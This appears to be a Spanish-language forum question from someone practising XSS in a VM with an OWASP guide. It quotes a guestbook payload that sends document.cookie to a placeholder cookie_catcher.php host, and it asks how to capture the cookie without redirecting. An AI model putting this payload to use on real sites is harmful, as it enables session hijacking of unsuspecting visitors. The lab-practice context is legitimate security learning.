Estoy practicando en VM siguiendo la guía OWASP. Sé que es posible robar la cookie al redirigir a la página "Falsa", etc., pero me gustaría robar la cookie sin redirigir a otra página.
Entonces, si tienes algún libro de visitas y luego pones:
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
¿Cómo puedo colocar esto en una página existente sin redirigir?
Básicamente, lo que quiero es cuando alguien haga clic en el enlace, tome la cookie e imprímala en algún lugar de la página actual. Tal vez en alguna etiqueta alt
o lo que sea.
¿Alguna idea?